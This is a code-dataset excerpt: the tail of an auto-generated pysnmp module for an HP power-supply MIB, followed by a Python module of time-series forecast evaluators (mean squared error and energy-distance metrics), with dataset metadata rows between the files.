subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9))
namedValues = NamedValues(("psNotPresent", 1), ("psNotPlugged", 2), ("psPowered", 3), ("psFailed", 4), ("psPermFailure", 5), ("psMax", 6), ("psAuxFailure", 7), ("psNotPowered", 8), ("psAuxNotPowered", 9))
class HpicfXpsConnectionStatus(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5, 6, 7, 8))
namedValues = NamedValues(("notConnected", 0), ("unavailable", 1), ("available", 2), ("active", 3), ("mismatch", 4), ("notReady", 5), ("overCurrent", 6), ("cannotPower", 7), ("autoDisabled", 8))
class HpicfXpsZoneStatus(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))
namedValues = NamedValues(("notConnected", 1), ("notReady", 2), ("faulted", 3), ("powered", 4), ("inReset", 5))
hpicfPsTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1), )
if mibBuilder.loadTexts: hpicfPsTable.setStatus('current')
hpicfPsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1, 1), ).setIndexNames((0, "POWERSUPPLY-MIB", "hpicfPsBayNum"))
if mibBuilder.loadTexts: hpicfPsEntry.setStatus('current')
hpicfPsBayNum = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1, 1, 1), HpicfDcPsIndex())
if mibBuilder.loadTexts: hpicfPsBayNum.setStatus('current')
hpicfPsState = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1, 1, 2), HpicfDcPsState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfPsState.setStatus('current')
hpicfPsFailures = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfPsFailures.setStatus('current')
hpicfPsTemp = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfPsTemp.setStatus('current')
hpicfPsVoltageInfo = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1, 1, 5), SnmpAdminString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfPsVoltageInfo.setStatus('current')
hpicfPsWattageCur = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfPsWattageCur.setStatus('current')
hpicfPsWattageMax = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfPsWattageMax.setStatus('current')
hpicfPsLastCall = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfPsLastCall.setStatus('current')
hpicfPsModel = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1, 1, 9), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(1, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfPsModel.setStatus('current')
hpicfXpsTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2), )
if mibBuilder.loadTexts: hpicfXpsTable.setStatus('current')
hpicfXpsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1), ).setIndexNames((0, "ENTITY-MIB", "entPhysicalIndex"), (0, "POWERSUPPLY-MIB", "hpicfXpsConnectingPort"))
if mibBuilder.loadTexts: hpicfXpsEntry.setStatus('current')
hpicfXpsConnectingPort = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 1), Unsigned32())
if mibBuilder.loadTexts: hpicfXpsConnectingPort.setStatus('current')
hpicfXpsPortOperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('enable')).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsPortOperStatus.setStatus('current')
hpicfXpsSwitchSerialNo = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsSwitchSerialNo.setStatus('current')
hpicfXpsConnectionState = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 4), HpicfXpsConnectionStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsConnectionState.setStatus('current')
hpicfXpsSysName = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsSysName.setStatus('current')
hpicfXpsMACAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 6), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsMACAddress.setStatus('current')
hpicfXpsSwitchOSVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsSwitchOSVersion.setStatus('current')
hpicfXpsSwitchIpsVoltage = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 8), Unsigned32()).setUnits('Volts').setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsSwitchIpsVoltage.setStatus('current')
hpicfXpsSwitchIpsWattage = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 9), Unsigned32()).setUnits('Watts').setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsSwitchIpsWattage.setStatus('current')
hpicfXpsPower = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 10), Unsigned32()).setUnits('Watts').setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsPower.setStatus('current')
hpicfXpsSupportedCableVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 11), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsSupportedCableVersion.setStatus('current')
hpicfXpsSupportedZoneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 12), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsSupportedZoneVersion.setStatus('current')
hpicfXpsSwitchModType = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 13), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsSwitchModType.setStatus('current')
hpicfXpsSwitchConfigTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3), )
if mibBuilder.loadTexts: hpicfXpsSwitchConfigTable.setStatus('current')
hpicfXpsSwitchConfigEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3, 1), ).setIndexNames((0, "ENTITY-MIB", "entPhysicalIndex"))
if mibBuilder.loadTexts: hpicfXpsSwitchConfigEntry.setStatus('current')
hpicfXpsSwitchAdminStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('enable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: hpicfXpsSwitchAdminStatus.setStatus('current')
hpicfXpsSwitchAutoRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("yes", 1), ("no", 2))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: hpicfXpsSwitchAutoRecovery.setStatus('current')
hpicfXpsAllowPortsSupported = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3, 1, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(2, 4))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: hpicfXpsAllowPortsSupported.setStatus('current')
hpicfXpsReset = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("noReset", 1), ("factoryReset", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: hpicfXpsReset.setStatus('current')
hpicfXpsType = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3, 1, 5), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsType.setStatus('current')
hpicfXpsSerialNum = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsSerialNum.setStatus('current')
hpicfXpsModuleName = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsModuleName.setStatus('current')
hpicfXpsPowerShareReqStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("idle", 1), ("inProgress", 2), ("success", 3), ("failed", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsPowerShareReqStatus.setStatus('current')
hpicfXpsResetReqStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("idle", 1), ("inProgress", 2), ("success", 3), ("failed", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsResetReqStatus.setStatus('current')
hpicfXpsZoneTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4), )
if mibBuilder.loadTexts: hpicfXpsZoneTable.setStatus('current')
hpicfXpsZoneEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4, 1), ).setIndexNames((0, "ENTITY-MIB", "entPhysicalIndex"))
if mibBuilder.loadTexts: hpicfXpsZoneEntry.setStatus('current')
hpicfXpsZoneNo = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 3))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsZoneNo.setStatus('current')
hpicfXpsZoneState = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4, 1, 2), HpicfXpsZoneStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsZoneState.setStatus('current')
hpicfXpsZonePowerShareMap = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: hpicfXpsZonePowerShareMap.setStatus('current')
hpicfXpsZoneVoltage = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4, 1, 4), Unsigned32()).setUnits('Volts').setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsZoneVoltage.setStatus('current')
hpicfXpsZoneWattage = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4, 1, 5), Unsigned32()).setUnits('Watts').setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsZoneWattage.setStatus('current')
hpicfXpsPSURev = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4, 1, 6), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsPSURev.setStatus('current')
hpicfXpsPSUModule = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsPSUModule.setStatus('current')
hpicfXpsZonePowerShareForce = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4, 1, 8), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: hpicfXpsZonePowerShareForce.setStatus('current')
hpicfXpsZoneRecordVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4, 1, 9), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsZoneRecordVersion.setStatus('current')
hpicfPsConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2))
hpicfPsCompliance = MibIdentifier((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2, 1))
hpicfPsGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2, 2))
hpicfDcPsCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2, 1, 1)).setObjects(("POWERSUPPLY-MIB", "hpicfPsGroup"), ("POWERSUPPLY-MIB", "hpicfPsGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hpicfDcPsCompliance = hpicfDcPsCompliance.setStatus('deprecated')
hpicfXpsCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2, 1, 2)).setObjects(("POWERSUPPLY-MIB", "hpicfXpsGroup"), ("POWERSUPPLY-MIB", "hpicfXpsGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hpicfXpsCompliance = hpicfXpsCompliance.setStatus('current')
hpicfXpsZoneCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2, 1, 3)).setObjects(("POWERSUPPLY-MIB", "hpicfXpsZoneGroup"), ("POWERSUPPLY-MIB", "hpicfXpsZoneGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hpicfXpsZoneCompliance = hpicfXpsZoneCompliance.setStatus('current')
hpicfDcPsCompliance1 = ModuleCompliance((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2, 1, 4)).setObjects(("POWERSUPPLY-MIB", "hpicfPsGroup1"), ("POWERSUPPLY-MIB", "hpicfPsGroup1"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hpicfDcPsCompliance1 = hpicfDcPsCompliance1.setStatus('current')
hpicfPsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2, 2, 1)).setObjects(("POWERSUPPLY-MIB", "hpicfPsState"), ("POWERSUPPLY-MIB", "hpicfPsFailures"), ("POWERSUPPLY-MIB", "hpicfPsTemp"), ("POWERSUPPLY-MIB", "hpicfPsVoltageInfo"), ("POWERSUPPLY-MIB", "hpicfPsWattageCur"), ("POWERSUPPLY-MIB", "hpicfPsWattageMax"), ("POWERSUPPLY-MIB", "hpicfPsLastCall"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hpicfPsGroup = hpicfPsGroup.setStatus('deprecated')
hpicfXpsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2, 2, 2)).setObjects(("POWERSUPPLY-MIB", "hpicfXpsPortOperStatus"), ("POWERSUPPLY-MIB", "hpicfXpsSwitchSerialNo"), ("POWERSUPPLY-MIB", "hpicfXpsConnectionState"), ("POWERSUPPLY-MIB", "hpicfXpsSysName"), ("POWERSUPPLY-MIB", "hpicfXpsMACAddress"), ("POWERSUPPLY-MIB", "hpicfXpsSwitchOSVersion"), ("POWERSUPPLY-MIB", "hpicfXpsSwitchIpsVoltage"), ("POWERSUPPLY-MIB", "hpicfXpsSwitchIpsWattage"), ("POWERSUPPLY-MIB", "hpicfXpsPower"), ("POWERSUPPLY-MIB", "hpicfXpsSwitchAdminStatus"), ("POWERSUPPLY-MIB", "hpicfXpsSwitchAutoRecovery"), ("POWERSUPPLY-MIB", "hpicfXpsAllowPortsSupported"), ("POWERSUPPLY-MIB", "hpicfXpsReset"), ("POWERSUPPLY-MIB", "hpicfXpsType"), ("POWERSUPPLY-MIB", "hpicfXpsSerialNum"), ("POWERSUPPLY-MIB", "hpicfXpsModuleName"), ("POWERSUPPLY-MIB", "hpicfXpsPowerShareReqStatus"), ("POWERSUPPLY-MIB", "hpicfXpsResetReqStatus"), ("POWERSUPPLY-MIB", "hpicfXpsSupportedCableVersion"), ("POWERSUPPLY-MIB", "hpicfXpsSupportedZoneVersion"), ("POWERSUPPLY-MIB", "hpicfXpsSwitchModType"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hpicfXpsGroup = hpicfXpsGroup.setStatus('current')
hpicfXpsZoneGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2, 2, 3)).setObjects(("POWERSUPPLY-MIB", "hpicfXpsZoneNo"), ("POWERSUPPLY-MIB", "hpicfXpsZoneState"), ("POWERSUPPLY-MIB", "hpicfXpsZonePowerShareMap"), ("POWERSUPPLY-MIB", "hpicfXpsZoneVoltage"), ("POWERSUPPLY-MIB", "hpicfXpsZoneWattage"), ("POWERSUPPLY-MIB", "hpicfXpsPSURev"), ("POWERSUPPLY-MIB", "hpicfXpsPSUModule"), ("POWERSUPPLY-MIB", "hpicfXpsZonePowerShareForce"), ("POWERSUPPLY-MIB", "hpicfXpsZoneRecordVersion"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hpicfXpsZoneGroup = hpicfXpsZoneGroup.setStatus('current')
hpicfPsGroup1 = ObjectGroup((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2, 2, 4)).setObjects(("POWERSUPPLY-MIB", "hpicfPsState"), ("POWERSUPPLY-MIB", "hpicfPsFailures"), ("POWERSUPPLY-MIB", "hpicfPsTemp"), ("POWERSUPPLY-MIB", "hpicfPsVoltageInfo"), ("POWERSUPPLY-MIB", "hpicfPsWattageCur"), ("POWERSUPPLY-MIB", "hpicfPsWattageMax"), ("POWERSUPPLY-MIB", "hpicfPsLastCall"), ("POWERSUPPLY-MIB", "hpicfPsModel"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hpicfPsGroup1 = hpicfPsGroup1.setStatus('current')
mibBuilder.exportSymbols("POWERSUPPLY-MIB", hpicfXpsSerialNum=hpicfXpsSerialNum, hpicfEntityPs=hpicfEntityPs, hpicfDcPsCompliance1=hpicfDcPsCompliance1, hpicfXpsSwitchOSVersion=hpicfXpsSwitchOSVersion, hpicfPsTemp=hpicfPsTemp, hpicfXpsReset=hpicfXpsReset, PYSNMP_MODULE_ID=hpicfPsMIB, hpicfPsGroup1=hpicfPsGroup1, hpicfXpsMACAddress=hpicfXpsMACAddress, hpicfXpsZoneNo=hpicfXpsZoneNo, hpicfXpsSwitchAutoRecovery=hpicfXpsSwitchAutoRecovery, hpicfXpsZoneVoltage=hpicfXpsZoneVoltage, hpicfXpsZoneWattage=hpicfXpsZoneWattage, hpicfPsLastCall=hpicfPsLastCall, hpicfXpsCompliance=hpicfXpsCompliance, hpicfPsGroups=hpicfPsGroups, hpicfXpsPowerShareReqStatus=hpicfXpsPowerShareReqStatus, hpicfXpsSwitchIpsWattage=hpicfXpsSwitchIpsWattage, hpicfPsVoltageInfo=hpicfPsVoltageInfo, hpicfXpsResetReqStatus=hpicfXpsResetReqStatus, hpicfXpsZonePowerShareForce=hpicfXpsZonePowerShareForce, hpicfPsTable=hpicfPsTable, hpicfXpsSwitchConfigEntry=hpicfXpsSwitchConfigEntry, hpicfXpsZoneEntry=hpicfXpsZoneEntry, hpicfXpsModuleName=hpicfXpsModuleName, hpicfXpsZoneRecordVersion=hpicfXpsZoneRecordVersion, hpicfXpsPSURev=hpicfXpsPSURev, HpicfDcPsState=HpicfDcPsState, hpicfXpsPortOperStatus=hpicfXpsPortOperStatus, hpicfXpsPSUModule=hpicfXpsPSUModule, hpicfXpsSwitchSerialNo=hpicfXpsSwitchSerialNo, hpicfXpsPower=hpicfXpsPower, HpicfXpsConnectionStatus=HpicfXpsConnectionStatus, hpicfPsState=hpicfPsState, HpicfXpsZoneStatus=HpicfXpsZoneStatus, hpicfXpsSwitchIpsVoltage=hpicfXpsSwitchIpsVoltage, hpicfXpsZoneGroup=hpicfXpsZoneGroup, hpicfXpsZonePowerShareMap=hpicfXpsZonePowerShareMap, hpicfPsMIB=hpicfPsMIB, hpicfPsModel=hpicfPsModel, hpicfDcPsCompliance=hpicfDcPsCompliance, hpicfXpsZoneTable=hpicfXpsZoneTable, hpicfXpsTable=hpicfXpsTable, hpicfXpsSupportedCableVersion=hpicfXpsSupportedCableVersion, hpicfXpsSwitchConfigTable=hpicfXpsSwitchConfigTable, hpicfXpsZoneCompliance=hpicfXpsZoneCompliance, hpicfXpsSwitchAdminStatus=hpicfXpsSwitchAdminStatus, hpicfPsConformance=hpicfPsConformance, HpicfDcPsIndex=HpicfDcPsIndex, hpicfXpsZoneState=hpicfXpsZoneState, hpicfXpsConnectingPort=hpicfXpsConnectingPort, hpicfPsGroup=hpicfPsGroup, hpicfPsFailures=hpicfPsFailures, hpicfXpsGroup=hpicfXpsGroup, hpicfPsEntry=hpicfPsEntry, hpicfXpsSwitchModType=hpicfXpsSwitchModType, hpicfXpsSupportedZoneVersion=hpicfXpsSupportedZoneVersion, hpicfXpsAllowPortsSupported=hpicfXpsAllowPortsSupported, hpicfXpsSysName=hpicfXpsSysName, hpicfPsWattageCur=hpicfPsWattageCur, hpicfXpsConnectionState=hpicfXpsConnectionState, hpicfPsBayNum=hpicfPsBayNum, hpicfPsCompliance=hpicfPsCompliance, hpicfXpsEntry=hpicfXpsEntry, hpicfPsWattageMax=hpicfPsWattageMax, hpicfXpsType=hpicfXpsType)
| 124.715976 | 2,641 | 0.737866 |
795c5cc245391cb0719d1ff3b2475599fd251801 | 4,824 | py | Python | timemachines/skatertools/evaluation/evaluators.py | iklasky/timemachines | 1820fa9453d31d4daaeff75274a935c7455febe3 | [
"MIT"
] | 253 | 2021-01-08T17:33:30.000Z | 2022-03-21T17:32:36.000Z | timemachines/skatertools/evaluation/evaluators.py | iklasky/timemachines | 1820fa9453d31d4daaeff75274a935c7455febe3 | [
"MIT"
] | 65 | 2021-01-20T16:43:35.000Z | 2022-03-30T19:07:22.000Z | timemachines/skatertools/evaluation/evaluators.py | iklasky/timemachines | 1820fa9453d31d4daaeff75274a935c7455febe3 | [
"MIT"
] | 28 | 2021-02-04T14:58:30.000Z | 2022-01-17T04:35:17.000Z | from timemachines.skatertools.data.synthetic import brownian_with_noise, brownian_with_exogenous
from timemachines.skating import residuals, prior_with_sporadic_fit
from timemachines.inclusion.sklearninclusion import using_sklearn
from timemachines.inclusion.scipyinclusion import using_scipy
import numpy as np
from timemachines.skatertools.utilities.conventions import targets
from typing import List
from timemachines.skatertools.data.real import hospital, hospital_with_exog
# Evaluation of skaters
def evaluator_from_name(name):
valid = [f for f in EVALUATORS if f.__name__==name ]
return valid[0] if len(valid)==1 else None
if using_sklearn:
from sklearn.metrics import mean_squared_error, mean_absolute_error
def evaluate_sklearn_metric(f, y, k:int, a=None, t=None, e_fit=60, e_nofit=-1, metric=None, r=None)->float:
""" Compute prior for skater and evaluate an sklearn metric
n_test: Number of data points to test with
Trains on history then computes several test samples
"""
return evaluate_sklearn_metric_with_sporadic_fit(f=f,y=y,k=k,a=a,t=t,e_fit=e_fit, e_nofit=e_nofit, r=r, fit_frequency=1, metric=metric )
def evaluate_sklearn_metric_with_sporadic_fit(f, y, k:int, a=None, t=None, e=None, r=None, metric=None,
n_test:int=10, e_fit=60, e_nofit=-1, fit_frequency:int=100)->float:
x, x_std = prior_with_sporadic_fit(f=f, y=y, k=k, a=a, t=t, r=r, n_test=n_test,
e_fit=e_fit, e_nofit=e_nofit, fit_frequency=fit_frequency)
yt = targets(y)
xk = [xt[-1] for xt in x]
return metric(yt[-n_test:], xk[-n_test:])
def evaluate_mean_squared_error_with_sporadic_fit(f, y, k:int, a=None, t=None, r=None, n_test:int=10, e_fit=60, e_nofit=-1, fit_frequency:int=100)->float:
return evaluate_sklearn_metric_with_sporadic_fit(f=f, y=y, k=k, a=a, t=t, r=r, metric=mean_squared_error, e_fit=e_fit, e_nofit=e_nofit, n_test=n_test, fit_frequency=fit_frequency)
def hospital_mean_square_error_with_sporadic_fit(f, k:int=1, n=120, r=None, n_test:int=10, e_fit=60, e_nofit=-1, fit_frequency:int=100)->float:
""" Useful for a quick test of a skater, univariate and random hyper-param """
y = hospital()[:n]
return evaluate_mean_squared_error_with_sporadic_fit(f=f, y=y, k=k, r=r, e_fit=e_fit, n_test=n_test, e_nofit=e_nofit, fit_frequency=fit_frequency)
def hospital_mean_square_error(f, k:int=1, n=120, r=None, n_test:int=10, e_fit=60, e_nofit=-1)->float:
""" Useful for a quick test of a skater, univariate and random hyper-param """
return hospital_mean_square_error_with_sporadic_fit(f=f, k=k, n=n, r=r, e_fit=e_fit, n_test=n_test, e_nofit=e_nofit, fit_frequency=1)
def hospital_exog_mean_square_error_with_sporadic_fit(f, k, n=120, r=None, n_test:int=10, e_fit=60, e_nofit=-1, fit_frequency:int=100)->float:
""" Useful for a quick test of a skater w/ exogenous inputs and known-in-advance variables """
y, a = hospital_with_exog(n=n,k=k)
return evaluate_mean_squared_error_with_sporadic_fit(f=f, y=y, a=a, k=k, r=r, n_test=n_test, e_fit=e_fit, e_nofit=e_nofit, fit_frequency=fit_frequency)
EVALUATORS = [evaluate_mean_squared_error_with_sporadic_fit]
else:
#pip install scikit-learn
EVALUATORS = []
# Energy distance between consecutive epochs
# (a more speculative way to evaluate point estimates)
def chunk_to_end(l:List, n:int)-> List[List]:
""" Break list in to evenly sized chunks
:param n: Size of batches
"""
rl = list(reversed(l))
chunks = [ list(reversed(rl[x:x + n])) for x in range(0, len(rl), n) ]
return list(reversed(chunks[:-1]))
if using_scipy:
from scipy.stats import energy_distance
def evaluate_energy(f, y=None, k=1, a=None, t=None, e=None, r=None, n_burn=30, n_epoch=30):
r = residuals(f=f, y=y, k=k, a=a, t=t, e=e, r=r, n_burn=n_burn)
r_chunks = chunk_to_end(r,n_epoch)
assert len(r_chunks)>=2,'Cannot evaluate ... try a shorter n_epoch '
uv = [ (u,v) for u,v in zip( r_chunks[1:],r_chunks[:-1] )] # residuals in one epoch versus the next
return np.mean([ energy_distance(u_values=u_values,v_values=v_values) for u_values, v_values in uv ])
def hospital_energy(f, k=3, n=100, n_epoch=20, n_burn=18):
y, a = hospital_with_exog(n=n+5)
return evaluate_energy(f=f, y=y, k=k, a=a, n_burn=n_burn, n_epoch=n_epoch)
def brownian_energy(f, n=500, **kwargs):
ys = brownian_with_noise(n)
return evaluate_energy(f=f, y=ys, **kwargs)
def exogenous_energy(f, n=500, **kwargs):
ys = brownian_with_exogenous(n)
return evaluate_energy(f=f, y=ys, **kwargs)
| 45.942857 | 187 | 0.692579 |
795c5cc631f00375a27f784611616ef675d75412 | 4,289 | py | Python | mangopay/tasks.py | sladinji/blousebrothers | 461de3ba011c0aaed3f0014136c4497b6890d086 | [
"MIT"
] | 1 | 2022-01-27T11:58:10.000Z | 2022-01-27T11:58:10.000Z | mangopay/tasks.py | sladinji/blousebrothers | 461de3ba011c0aaed3f0014136c4497b6890d086 | [
"MIT"
] | 5 | 2021-03-19T00:01:54.000Z | 2022-03-11T23:46:21.000Z | mangopay/tasks.py | sladinji/blousebrothers | 461de3ba011c0aaed3f0014136c4497b6890d086 | [
"MIT"
